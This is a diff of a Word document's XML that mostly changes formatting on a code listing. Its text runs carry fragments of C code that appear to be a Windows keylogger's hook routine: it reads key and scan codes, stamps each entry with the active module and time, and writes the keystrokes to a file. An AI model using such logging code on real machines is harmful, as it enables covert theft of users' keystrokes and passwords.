+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>strcat(moduleName, "\r\n");</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4062,43 +4511,41 @@
         <w:tabs>
           <w:tab w:val="left" w:pos="2355"/>
         </w:tabs>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="360"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-        <w:t>strcat(moduleName, "\r\n");</w:t>
+        <w:ind w:left="708"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>WriteFile(file, moduleName, strlen(moduleName), &amp;written, NULL);</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4106,43 +4553,32 @@
         <w:tabs>
           <w:tab w:val="left" w:pos="2355"/>
         </w:tabs>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="360"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-        <w:t>WriteFile(file, moduleName, strlen(moduleName), &amp;written, NULL);</w:t>
+        <w:ind w:left="708"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>}</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4150,85 +4586,79 @@
         <w:tabs>
           <w:tab w:val="left" w:pos="2355"/>
         </w:tabs>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="360"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-        <w:t>}</w:t>
-      </w:r>
+        <w:ind w:left="708"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
         <w:tabs>
           <w:tab w:val="left" w:pos="2355"/>
         </w:tabs>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="360"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
+        <w:ind w:left="708"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>GetLocalTime(&amp;st);</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:tabs>
           <w:tab w:val="left" w:pos="2355"/>
         </w:tabs>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="360"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-        <w:t>GetLocalTime(&amp;st);</w:t>
+        <w:ind w:left="708"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>GetTimeFormat(LOCALE_SYSTEM_DEFAULT, 0, &amp;st, NULL, g_buf, MAX_BUFSIZE);</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4236,34 +4666,51 @@
         <w:tabs>
           <w:tab w:val="left" w:pos="2355"/>
         </w:tabs>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="360"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-        <w:t>GetTimeFormat(LOCALE_SYSTEM_DEFAULT, 0, &amp;st, NULL, g_buf, MAX_BUFSIZE);</w:t>
+        <w:ind w:left="708"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>strcat(g_buf, "</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>");</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4271,53 +4718,32 @@
         <w:tabs>
           <w:tab w:val="left" w:pos="2355"/>
         </w:tabs>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="360"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-        <w:t>strcat(g_buf, "</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-        <w:t>");</w:t>
+        <w:ind w:left="708"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>char * buf = g_buf + strlen(g_buf);</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4325,34 +4751,32 @@
         <w:tabs>
           <w:tab w:val="left" w:pos="2355"/>
         </w:tabs>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="360"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-        <w:t>char * buf = g_buf + strlen(g_buf);</w:t>
+        <w:ind w:left="708"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>if (getSysKey(ks-&gt;vkCode))</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4360,34 +4784,32 @@
         <w:tabs>
           <w:tab w:val="left" w:pos="2355"/>
         </w:tabs>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="360"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-        <w:t>if (getSysKey(ks-&gt;vkCode))</w:t>
+        <w:ind w:left="708"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>{</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4395,34 +4817,41 @@
         <w:tabs>
           <w:tab w:val="left" w:pos="2355"/>
         </w:tabs>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="360"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-        <w:t>{</w:t>
+        <w:ind w:left="708"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>WriteFile(file, g_buf, strlen(g_buf), &amp;written, NULL);</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4430,43 +4859,32 @@
         <w:tabs>
           <w:tab w:val="left" w:pos="2355"/>
         </w:tabs>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="360"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-        <w:t>WriteFile(file, g_buf, strlen(g_buf), &amp;written, NULL);</w:t>
+        <w:ind w:left="708"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>}</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4474,34 +4892,32 @@
         <w:tabs>
           <w:tab w:val="left" w:pos="2355"/>
         </w:tabs>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="360"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-        <w:t>}</w:t>
+        <w:ind w:left="708"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>else if (getCharKey(ks-&gt;vkCode, ks-&gt;scanCode, (LPWORD) buf, winID))</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4509,34 +4925,32 @@
         <w:tabs>
           <w:tab w:val="left" w:pos="2355"/>
         </w:tabs>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="360"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-        <w:t>else if (getCharKey(ks-&gt;vkCode, ks-&gt;scanCode, (LPWORD) buf, winID))</w:t>
+        <w:ind w:left="708"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>{</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4544,42 +4958,42 @@
         <w:tabs>
           <w:tab w:val="left" w:pos="2355"/>
         </w:tabs>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="360"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
